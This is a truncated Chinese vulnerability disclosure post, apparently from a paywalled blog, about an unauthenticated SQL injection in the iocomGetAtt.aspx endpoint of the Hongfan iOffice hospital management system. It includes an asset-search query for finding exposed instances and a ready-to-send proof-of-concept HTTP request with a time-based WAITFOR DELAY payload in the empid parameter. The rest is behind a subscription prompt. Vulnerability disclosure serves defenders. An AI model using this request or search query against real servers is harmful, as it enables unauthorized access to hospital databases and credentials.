超级会员免费看
红帆iOffice是一款专注于医院业务管理的软件,但其iocomGetAtt.aspx接口存在SQL注入漏洞,未授权攻击者可能利用此漏洞窃取数据库敏感信息,威胁服务器安全。
产品简介
红帆iOffice.net从最早满足医院行政办公需求(传统 OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。
漏洞概述
红帆iOffice iocomGetAtt.aspx接囗处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
网络测绘
app = “红帆-ioffice”
漏洞POC
GET /ioffice/prg/interface/iocomGetAtt.aspx?NewPdf=1&empid=1;WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
Host:ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.
订阅专栏 解锁全文
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
